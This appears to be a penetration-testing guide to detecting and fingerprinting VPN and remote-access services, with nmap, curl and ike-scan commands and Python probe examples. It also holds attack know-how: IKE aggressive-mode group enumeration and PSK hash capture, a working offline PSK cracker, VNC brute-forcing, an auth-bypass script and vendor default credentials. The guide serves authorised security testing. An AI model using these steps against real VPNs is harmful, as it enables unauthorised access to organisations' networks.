
VPN & Remote Access Detection

Identifying and analyzing VPN endpoints and remote access services.

Overview

Common remote access technologies:

  • IPsec VPN (IKE)
  • SSL VPN (OpenVPN, Fortinet, Palo Alto)
  • Citrix Gateway
  • Microsoft RDP Gateway
  • TeamViewer and similar remote desktop tools

IPsec VPN Detection

ike-scan

Discover and fingerprint IKE (IPsec) VPN servers.

Installation

# Debian/Ubuntu
apt install ike-scan

# Compile from source
git clone https://github.com/royhills/ike-scan.git
cd ike-scan
autoreconf --install
./configure
make
sudo make install

Basic Usage

# Scan single host
ike-scan 192.168.1.1

# Scan network range
ike-scan 192.168.1.0/24

# Verbose output
ike-scan -v 192.168.1.1

# Show backoff fingerprint
ike-scan --showbackoff 192.168.1.1

# Aggressive mode with an identity (ike-scan's option is --id, not -id)
ike-scan -A --id=test 192.168.1.1

# Specify a single transform: enc,hash,auth,group (5,2,1,2 = 3DES, SHA1, PSK, DH group 2)
ike-scan --trans=5,2,1,2 192.168.1.1

# NAT-T port: UDP/4500 expects NAT-Traversal encapsulation (a 4-byte non-ESP
# marker in front of the ISAKMP header); --nat-t adds it and switches to 4500
ike-scan --nat-t 192.168.1.1

# Plain IKE to an arbitrary destination port (no encapsulation; most
# responders ignore this on 4500)
ike-scan --dport=4500 192.168.1.1

Vendor Fingerprinting

# Vendor ID payloads in the reply are printed by default; -M puts each on
# its own line (--vendor is for sending a Vendor ID, not for showing them)
ike-scan -M 192.168.1.1

# Add the retransmission backoff pattern, which fingerprints the
# implementation even when it sends no Vendor ID at all
ike-scan -M --showbackoff 192.168.1.1

# Common VPN vendors to identify:
# - Cisco
# - Fortinet
# - Palo Alto
# - SonicWall
# - Check Point
# - Juniper
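
What ike-scan is doing underneath, as an added example rather than ike-scan's own code: it sends one ISAKMP main-mode SA proposal (the 3DES/SHA1/PSK/DH2 transform that `--trans=5,2,1,2` selects) and walks the responder's payload chain looking for Vendor ID payloads, which are then matched against a table of known values. The `KNOWN_VIDS` table here is a four-entry excerpt of what ike-scan ships in `ike-vendor-ids` and is an assumption for illustration; `fake_responder_packet` is a constructed reply, not a capture from any device. `probe` binds UDP source port 500 because several responders ignore other source ports, which is why ike-scan itself needs root.

```python
"""IKEv1 main-mode probe and Vendor ID extractor (added example, not ike-scan's
code). Sends an SA proposal, parses the responder's payload chain and names
the Vendor ID payloads it finds."""
import os
import socket
import struct
from typing import Iterator, List, Optional, Tuple

# ISAKMP payload types (RFC 2408, section 3.1) and the main-mode exchange type
PAYLOAD_NONE, PAYLOAD_SA, PAYLOAD_VID = 0, 1, 13
EXCH_MAIN_MODE = 2

# Excerpt of well-known Vendor IDs as listed in ike-scan's ike-vendor-ids file
# (assumed table for this example; load the full file for real fingerprinting)
KNOWN_VIDS = {
    "09002689dfd6b712": "XAUTH",
    "afcad71368a1f1c96b8696fc77570100": "Dead Peer Detection v1.0",
    "4a131c81070358455c5728f20e95452f": "RFC 3947 NAT-T",
    "12f5f28c457168a9702d9fe274cc0100": "Cisco Unity",
}


def _payload(next_type: int, body: bytes) -> bytes:
    """Generic payload header: next payload, reserved, total length."""
    return struct.pack("!BBH", next_type, 0, 4 + len(body)) + body


def _attr(atype: int, value: int) -> bytes:
    """Basic (TV) SA attribute: type with the high bit set, 16-bit value."""
    return struct.pack("!HH", 0x8000 | atype, value)


def build_main_mode_sa(icookie: bytes) -> bytes:
    """First main-mode packet offering one transform, 3DES/SHA1/PSK/DH2,
    the same proposal as `ike-scan --trans=5,2,1,2`."""
    transform = _payload(PAYLOAD_NONE,
                         struct.pack("!BBH", 1, 1, 0)        # transform #1, KEY_IKE, reserved
                         + _attr(1, 5)                       # encryption: 3DES-CBC
                         + _attr(2, 2)                       # hash: SHA1
                         + _attr(3, 1)                       # auth: pre-shared key
                         + _attr(4, 2)                       # DH group 2 (1024-bit MODP)
                         + _attr(11, 1) + _attr(12, 28800))  # lifetime: 28800 seconds
    proposal = _payload(PAYLOAD_NONE,
                        struct.pack("!BBBB", 1, 1, 0, 1) + transform)  # proposal 1, ISAKMP, no SPI, 1 transform
    sa = _payload(PAYLOAD_NONE, struct.pack("!II", 1, 1) + proposal)  # DOI IPsec, SIT_IDENTITY_ONLY
    header = struct.pack("!8s8sBBBBII", icookie, bytes(8), PAYLOAD_SA,
                         0x10, EXCH_MAIN_MODE, 0, 0, 28 + len(sa))
    return header + sa


def parse_payloads(packet: bytes) -> Iterator[Tuple[int, bytes]]:
    """Walk the payload chain after the 28-byte header, yielding (type, body).
    Stops on the first inconsistent length instead of trusting the rest."""
    if len(packet) < 28:
        return
    next_type, offset = packet[16], 28
    while next_type != PAYLOAD_NONE and offset + 4 <= len(packet):
        nxt, _, length = struct.unpack("!BBH", packet[offset:offset + 4])
        if length < 4 or offset + length > len(packet):
            return
        yield next_type, packet[offset + 4:offset + length]
        next_type, offset = nxt, offset + length


def vendor_ids(packet: bytes) -> List[Tuple[str, str]]:
    """(hex, name) for every Vendor ID payload in a responder's packet."""
    return [(body.hex(), KNOWN_VIDS.get(body.hex(), "unknown"))
            for ptype, body in parse_payloads(packet) if ptype == PAYLOAD_VID]


def probe(host: str, port: int = 500, timeout: float = 3.0) -> Optional[bytes]:
    """Send the proposal from UDP source port 500 (root needed) and return the
    raw reply, or None on silence or a reply that is not for our cookie."""
    icookie = os.urandom(8)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.bind(("", port))
        sock.sendto(build_main_mode_sa(icookie), (host, port))
        reply, _ = sock.recvfrom(4096)
    except socket.timeout:
        return None
    finally:
        sock.close()
    # a genuine responder echoes our initiator cookie and fills in its own
    return reply if reply[:8] == icookie and reply[8:16] != bytes(8) else None


def fake_responder_packet(icookie: bytes) -> bytes:
    """Constructed sample reply (not captured from any device): a minimal SA
    payload followed by three Vendor ID payloads, chained via next-payload."""
    vids = [bytes.fromhex(v) for v in ("09002689dfd6b712",
                                       "afcad71368a1f1c96b8696fc77570100",
                                       "deadbeef")]
    body = _payload(PAYLOAD_VID, struct.pack("!II", 1, 1))
    for i, vid in enumerate(vids):
        body += _payload(PAYLOAD_VID if i + 1 < len(vids) else PAYLOAD_NONE, vid)
    header = struct.pack("!8s8sBBBBII", icookie, os.urandom(8), PAYLOAD_SA,
                         0x10, EXCH_MAIN_MODE, 0, 0, 28 + len(body))
    return header + body


if __name__ == "__main__":
    for hexvid, name in vendor_ids(fake_responder_packet(os.urandom(8))):
        print(f"VID={hexvid} ({name})")
```

Run `probe("192.168.1.1")` as root and feed the reply to `vendor_ids` to reproduce the VID lines of `ike-scan -M`; a reply with no Vendor ID payloads is exactly the case where `--showbackoff` timing is the only fingerprint left.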

Aggressive Mode

# Aggressive mode: the responder sends its identity and HASH_R before the
# initiator has proven anything, so a PSK responder leaks a crackable hash
ike-scan -A 192.168.1.1

# With a group name as the identity
ike-scan -A --id=vpngroup 192.168.1.1

# Guess group names: a responder that only answers for a valid group ID
# turns this into group enumeration
while read -r group; do
  echo "[*] $group"
  ike-scan -A --id="$group" 192.168.1.1
done < groups.txt

# Common group names:
cat > groups.txt <<EOF
vpn
remote
group
main
default
tunnel
users
EOF

PSK Cracking

# Save the aggressive-mode handshake in psk-crack format
ike-scan -A --id=vpngroup --pskcrack=handshake.txt 192.168.1.1

# Crack with psk-crack (ships with ike-scan)
psk-crack -d /usr/share/wordlists/rockyou.txt handshake.txt

# hashcat reads the --pskcrack file as-is; pick the mode by the length of the
# last field (HASH_R): 32 hex chars = HMAC-MD5 (5300), 40 = HMAC-SHA1 (5400)
hashcat -m 5400 handshake.txt /usr/share/wordlists/rockyou.txt
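
The computation psk-crack and hashcat modes 5300/5400 perform, written out as an added example (this is not psk-crack's own code). It parses the colon-separated record that `ike-scan --pskcrack` writes (`g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r`, all hex), recomputes HASH_R per RFC 2409 for each candidate PSK, and infers the PRF from the hash length exactly as you pick the hashcat mode. `make_handshake` builds a constructed record for a known PSK so the cracker can be exercised offline; its nonces, DH values and cookies are random and its SAi_b is the one-transform 3DES/SHA1/PSK/DH2 proposal, none of it captured from a real device.

```python
"""IKEv1 aggressive-mode PSK recovery (added example, not psk-crack's code).
Input is one ike-scan --pskcrack record:
    g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r  (hex fields)"""
import hashlib
import hmac
import os
from typing import Dict, Iterable, Optional

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
PRFS = {"md5": hashlib.md5, "sha1": hashlib.sha1}


def parse_pskcrack_line(line: str) -> Dict[str, bytes]:
    """Split one --pskcrack record into named byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def compute_hash_r(psk: bytes, f: Dict[str, bytes], prf) -> bytes:
    """RFC 2409 section 5.4:
         SKEYID = prf(PSK, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Everything except the PSK is on the wire in aggressive mode, so HASH_R
    can be tested against guesses offline."""
    skeyid = hmac.new(psk, f["ni_b"] + f["nr_b"], prf).digest()
    msg = f["g_xr"] + f["g_xi"] + f["cky_r"] + f["cky_i"] + f["sai_b"] + f["idir_b"]
    return hmac.new(skeyid, msg, prf).digest()


def crack(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose HASH_R matches, else None.
    PRF from hash length: 16 bytes = HMAC-MD5 (hashcat 5300),
    20 bytes = HMAC-SHA1 (hashcat 5400)."""
    f = parse_pskcrack_line(line)
    prf = {16: hashlib.md5, 20: hashlib.sha1}.get(len(f["hash_r"]))
    if prf is None:
        raise ValueError(f"unsupported HASH_R length {len(f['hash_r'])}")
    for cand in candidates:
        if hmac.compare_digest(compute_hash_r(cand.encode(), f, prf), f["hash_r"]):
            return cand
    return None


def make_handshake(psk: str, prf_name: str = "sha1", group_id: str = "vpngroup") -> str:
    """Constructed record for a known PSK (not a capture), in ike-scan's field
    order. SAi_b is the SA payload body for one 3DES/SHA1/PSK/DH2 transform;
    IDir_b is an ID_USER_FQDN identity carrying the group name."""
    prf = PRFS[prf_name]
    f = {
        "g_xr": os.urandom(128), "g_xi": os.urandom(128),
        "cky_r": os.urandom(8), "cky_i": os.urandom(8),
        "sai_b": bytes.fromhex("0000000100000001"                  # DOI IPsec, SIT_IDENTITY_ONLY
                               "0000002801010001"                  # proposal 1, ISAKMP, no SPI, 1 transform
                               "0000002001010000"                  # transform 1, KEY_IKE
                               "80010005800200028003000180040002"  # 3DES, SHA1, PSK, DH2
                               "800b0001800c7080"),                # life type seconds, 28800
        "idir_b": bytes([3, 0, 0, 0]) + group_id.encode(),         # ID_USER_FQDN, proto/port 0
        "ni_b": os.urandom(20), "nr_b": os.urandom(20),
    }
    f["hash_r"] = compute_hash_r(psk.encode(), f, prf)
    return ":".join(f[k].hex() for k in FIELDS)


if __name__ == "__main__":
    record = make_handshake("cisco123")
    print(crack(record, ["password", "vpn", "cisco123"]))  # cisco123
```

Note that only the responder's hash is attacked: the initiator never has to know the PSK, which is why a single unauthenticated `ike-scan -A` exchange is enough, and why main mode (where HASH_R is sent encrypted) does not leak the same way.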

Nmap IPsec Detection

# IKE version and vendor fingerprint; the script sends several probes,
# including aggressive-mode ones, to get a reply from responders that
# ignore a bare main-mode proposal
nmap -sU -p 500 --script ike-version 192.168.1.1

# Add service detection for the isakmp banner match
nmap -sU -sV -p 500 --script ike-version 192.168.1.1

SSL VPN Detection

OpenVPN

# Version detection on the default port; there is no dedicated openvpn NSE
# script, but -sV's probes recognise the server's reset reply
nmap -sV -sU -p 1194 192.168.1.1

# Both UDP and TCP (443/tcp is a common alternative)
nmap -sV -sU -sT -p U:1194,T:1194,443 192.168.1.1

# Caveat: a server configured with tls-auth or tls-crypt silently drops any
# packet without a valid HMAC, so no response does not prove the port is dead
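
The exchange the probes above rely on, as an added example (this is not code from the OpenVPN project): a client opens with a `P_CONTROL_HARD_RESET_CLIENT_V2` packet and a server without `tls-auth`/`tls-crypt` answers with a `P_CONTROL_HARD_RESET_SERVER_V2` that acks packet 0 and echoes the client's session ID. The parser checks that echo so a stray packet is not mistaken for a server. `fake_server_reply` is a constructed reply for offline use, not a capture; the port and timeout defaults are assumptions.

```python
"""OpenVPN client-reset probe and reply parser (added example, not OpenVPN
project code)."""
import os
import socket
import struct
from typing import Optional

# Control-channel opcodes: high 5 bits of the first byte; low 3 bits = key_id
P_CONTROL_HARD_RESET_CLIENT_V2 = 7
P_CONTROL_HARD_RESET_SERVER_V2 = 8


def build_client_reset(session_id: bytes) -> bytes:
    """First packet of a client with no tls-auth/tls-crypt:
    opcode|key_id, our 8-byte session id, empty ack array, packet id 0."""
    if len(session_id) != 8:
        raise ValueError("session id must be 8 bytes")
    return (bytes([(P_CONTROL_HARD_RESET_CLIENT_V2 << 3) | 0])
            + session_id + b"\x00" + struct.pack("!I", 0))


def parse_server_reset(reply: bytes, our_session_id: bytes) -> Optional[dict]:
    """Validate a P_CONTROL_HARD_RESET_SERVER_V2 and extract its fields.
    Layout: opcode byte, server session id (8), ack count (1), acked packet
    ids (4 each), our session id (8, present only when ack count > 0),
    server packet id (4). Returns None for anything that does not fit."""
    if len(reply) < 10:
        return None
    opcode, key_id = reply[0] >> 3, reply[0] & 0x07
    if opcode != P_CONTROL_HARD_RESET_SERVER_V2:
        return None
    server_sid, n_acks = reply[1:9], reply[9]
    pos = 10 + 4 * n_acks
    if len(reply) < pos + (8 if n_acks else 0) + 4:
        return None
    acks = [struct.unpack("!I", reply[10 + 4 * i:14 + 4 * i])[0] for i in range(n_acks)]
    if n_acks:
        if reply[pos:pos + 8] != our_session_id:
            return None          # not a reply to our session; ignore it
        pos += 8
    packet_id = struct.unpack("!I", reply[pos:pos + 4])[0]
    return {"server_session_id": server_sid.hex(), "key_id": key_id,
            "acks": acks, "packet_id": packet_id}


def probe(host: str, port: int = 1194, tcp: bool = False,
          timeout: float = 3.0) -> Optional[dict]:
    """Send one client reset and parse the answer. Silence means either no
    OpenVPN here or a server with tls-auth/tls-crypt, which drops packets
    lacking a valid HMAC without replying."""
    sid = os.urandom(8)
    pkt = build_client_reset(sid)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM if tcp else socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        if tcp:   # TCP framing: each packet is prefixed with a 16-bit big-endian length
            sock.connect((host, port))
            sock.sendall(struct.pack("!H", len(pkt)) + pkt)
            hdr = sock.recv(2)
            if len(hdr) < 2:
                return None
            reply = sock.recv(struct.unpack("!H", hdr)[0])
        else:
            sock.sendto(pkt, (host, port))
            reply, _ = sock.recvfrom(4096)
    except (socket.timeout, ConnectionError):
        return None
    finally:
        sock.close()
    return parse_server_reset(reply, sid)


def fake_server_reply(our_session_id: bytes) -> bytes:
    """Constructed reply (not a capture) shaped like a server hard reset
    that acks our packet 0 and echoes our session id."""
    return (bytes([P_CONTROL_HARD_RESET_SERVER_V2 << 3]) + bytes.fromhex("0102030405060708")
            + b"\x01" + struct.pack("!I", 0) + our_session_id + struct.pack("!I", 0))


if __name__ == "__main__":
    sid = os.urandom(8)
    print(parse_server_reset(fake_server_reply(sid), sid))
```

`probe("192.168.1.1")` returns a dict with the server's session ID on a plain OpenVPN listener and None otherwise; treat None as "unknown", not "closed", for the tls-auth reason in the docstring.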

Fortinet FortiGate

# SSL VPN portal is commonly on 10443 (often 443 as well); admin GUI defaults to 443
nmap -p 443,8443,10443 --script http-title,ssl-cert 192.168.1.1

# Certificate subject/issuer (</dev/null stops s_client from waiting on stdin).
# The factory certificate is issued by Fortinet with the unit serial number as
# CN; a CA-issued certificate hides this, so treat it as a hint, not a rule.
openssl s_client -connect 192.168.1.1:10443 </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer

# SSL VPN login page
curl -k https://192.168.1.1/remote/login
curl -k https://192.168.1.1:10443/remote/login

# Common ports:
# 443   - admin GUI HTTPS (SSL VPN on some deployments)
# 10443 - SSL VPN portal
# 8443  - alternative SSL VPN / admin

Palo Alto GlobalProtect

# Detection
nmap -p 443 --script http-title,ssl-cert 192.168.1.1

# Portal login page ("GlobalProtect" appears in the HTML)
curl -k https://192.168.1.1/global-protect/login.esp

# Gateway login page
curl -k https://192.168.1.1/ssl-vpn/login.esp

# Identify via certificate (</dev/null so s_client exits after the handshake)
openssl s_client -connect 192.168.1.1:443 </dev/null 2>/dev/null | openssl x509 -noout -subject -issuer | grep -i "palo alto"

# Portal configuration endpoint: normally answered only to a POST with
# credentials; note it if an unauthenticated request gets a real config back
curl -k https://192.168.1.1/global-protect/getconfig.esp

Cisco AnyConnect

# Detection: an ASA/FTD with WebVPN redirects / to the logon page, so keep headers
curl -k -i https://192.168.1.1/ | grep -iE "anyconnect|CSCOE|webvpn"

# Check HTTPS title
nmap -p 443 --script http-title 192.168.1.1

# AnyConnect aggregate-auth endpoint (the client POSTs XML here and gets XML back)
curl -k -X POST https://192.168.1.1/CSCOSSLC/config-auth

# SAML assertion consumer endpoint (present when a tunnel group uses SAML)
curl -k "https://192.168.1.1/+CSCOE+/saml/sp/acs?tgname=tg"

# Typical URL patterns:
# /+CSCOE+/logon.html
# /+webvpn+/index.html

Pulse Secure (Juniper)

# Detection
curl -k https://192.168.1.1/dana-na/auth/url_default/welcome.cgi

# Check for Pulse
curl -k https://192.168.1.1/ | grep -i "pulse"

# Meeting page (often exposed)
curl -k https://192.168.1.1/dana-na/meeting/meeting.cgi

# Admin login
curl -k https://192.168.1.1/admin

SonicWall SSL VPN

# Detection
curl -k https://192.168.1.1/cgi-bin/welcome

# Login page
curl -k https://192.168.1.1/ | grep -i "sonicwall"

# Additional SMA 100 series CGI path (existence check; it is not a version banner)
curl -k -I https://192.168.1.1/cgi-bin/jarrewrite.sh

Citrix Detection

Citrix Gateway

# Nmap scripts
nmap -p 443 --script citrix-* 192.168.1.1

# Citrix enumeration
nmap -p 443 --script citrix-enum-servers,citrix-enum-apps 192.168.1.1

# Check for Citrix
curl -k https://192.168.1.1/vpn/index.html | grep -i citrix

# Web Interface login page (the XML Service that the citrix-enum-* scripts
# query is a separate listener, usually on 80/443/8080)
curl -k https://192.168.1.1/Citrix/XenApp/auth/login.aspx

# Common endpoints:
# /vpn/index.html
# /Citrix/XenApp
# /Citrix/StoreWeb
# /Citrix/Store/discovery

Citrix ADC (NetScaler)

# Nmap detection
nmap -p 443 --script http-title,http-headers 192.168.1.1

# Gateway login page and NetScaler cookies (all prefixed NSC_)
curl -k -I https://192.168.1.1/vpn/index.html | grep -i "NSC_"

# Root redirect: a Gateway vserver bounces / to /vpn/index.html
curl -k -I https://192.168.1.1/ | grep -i "^location"

# Version: the login page carries no version string; public NetScaler
# version scanners infer it by hashing static resources under /vpn/
# against a table of known builds

# Common vulnerabilities to check:
# - Citrix Bleed (CVE-2023-4966): session token disclosure on unpatched builds
# - Authentication bypass in older builds; compare the running build with vendor advisories

RDP Gateway

Detection

# RD Gateway listens on TCP 443 (RPC over HTTPS transport) and UDP 3391;
# 3389 is the RDP host behind it, not the gateway
nmap -sT -sU -p T:443,3389,U:3391 192.168.1.1

# Check for RD Web Access
curl -k -I https://192.168.1.1/RDWeb/

# RD Gateway HTTP transport endpoint: a gateway answers this path with
# something other than 404, an ordinary IIS site does not
curl -k -I https://192.168.1.1/remoteDesktopGateway/

# RDP host itself: security layer / NLA and NTLM host info
nmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info 192.168.1.1

Remote Desktop Tools

TeamViewer

# Default port
nmap -p 5938 192.168.1.1

# Alternative ports
nmap -p 5938,443,80 192.168.1.1

# Check service
nc -v 192.168.1.1 5938

VNC

# VNC ports
nmap -p 5900-5910 192.168.1.1

# VNC authentication check
nmap -p 5900 --script vnc-info,vnc-title 192.168.1.1

# RealVNC
nmap -p 5900 --script realvnc-auth-bypass 192.168.1.1

# vnc-info lists the offered security types; "None" means no password is required
nmap -p 5900 --script vnc-info 192.168.1.1

# Password guessing (where in scope)
nmap -p 5900 --script vnc-brute --script-args passdb=passwords.txt 192.168.1.1

Automated VPN Discovery

VPN Hunter Script

#!/usr/bin/env bash
# VPN hunter: quick presence checks for common VPN and remote-access services.
# ike-scan (binds UDP/500) and nmap -sU need root. "detected" is printed only
# when a vendor-specific marker is seen, so a miss is not proof of absence.
set -u
TARGET="${1:?usage: $0 <host>}"
CURL=(curl -skL --max-time 8)

echo "[+] Scanning for VPN services on $TARGET"

# IPsec: ike-scan's summary line counts responders that returned a handshake
echo -e "\n[*] Checking IPsec VPN"
ike-scan -M "$TARGET" 2>/dev/null | grep -q "1 returned handshake" && echo "[+] IPsec VPN detected (UDP/500)"

# OpenVPN: require a definite "open" (not UDP's usual "open|filtered");
# a server with tls-auth/tls-crypt answers nothing and is missed here
echo -e "\n[*] Checking OpenVPN"
nmap -sU -sV -p 1194 "$TARGET" 2>/dev/null | grep -qE '^1194/udp\s+open\s' && echo "[+] OpenVPN detected on UDP/1194"

# SSL VPN vendors: fetch a product-specific path and look for a marker string
echo -e "\n[*] Checking SSL VPN vendors"
check_http() {   # check_http <path> <extended regex> <label>
  "${CURL[@]}" "https://$TARGET$1" 2>/dev/null | grep -qiE "$2" && echo "[+] $3 detected"
}
check_http /remote/login                         'forti'                   'FortiGate SSL VPN'
check_http /global-protect/login.esp             'globalprotect'           'Palo Alto GlobalProtect'
check_http /                                     'anyconnect|webvpn|CSCOE' 'Cisco AnyConnect'
check_http /dana-na/auth/url_default/welcome.cgi 'pulse|ivanti|dana-na'    'Pulse Secure / Ivanti Connect Secure'
check_http /vpn/index.html                       'citrix|netscaler'        'Citrix Gateway'
check_http /cgi-bin/welcome                      'sonicwall'               'SonicWall SSL VPN'
check_http /RDWeb/                               'rdweb|remoteapp'         'RD Web Access / RD Gateway'

echo -e "\n[+] VPN scan complete"

VPN Vulnerability Scanning

Common Issues to Check

# Weak ciphers
nmap --script ssl-enum-ciphers -p 443 192.168.1.1

# Default credentials (factory state only; most products force a change on first login)
# Fortinet: admin/(blank) or admin/admin
# Palo Alto: admin/admin
# Pulse/Ivanti: no fixed factory default; the admin account is created during initial setup

# Information disclosure
curl -k https://192.168.1.1/api/v1/version
curl -k https://192.168.1.1/dana-na/nc/nc_gina_ver.txt

# Known CVEs
nmap -p 443 --script vuln 192.168.1.1

MFA Bypass Testing

Check for:

  • Legacy authentication endpoints
  • API without MFA
  • Race conditions
  • Session fixation
  • Remember me bypasses

Quick Reference

# IPsec VPN discovery
ike-scan 192.168.1.0/24

# Aggressive mode with group name
ike-scan -A --id=vpngroup 192.168.1.1

# SSL VPN fingerprinting
curl -k https://192.168.1.1/ | grep -iE "fortinet|palo alto|cisco|pulse|citrix|sonicwall"

# Check common SSL VPN ports
nmap -p 443,10443,8443,4443 192.168.1.1

# Citrix enumeration
nmap -p 443 --script citrix-enum-* 192.168.1.1

# VNC discovery
nmap -p 5900-5910 --script vnc-* 192.168.1.0/24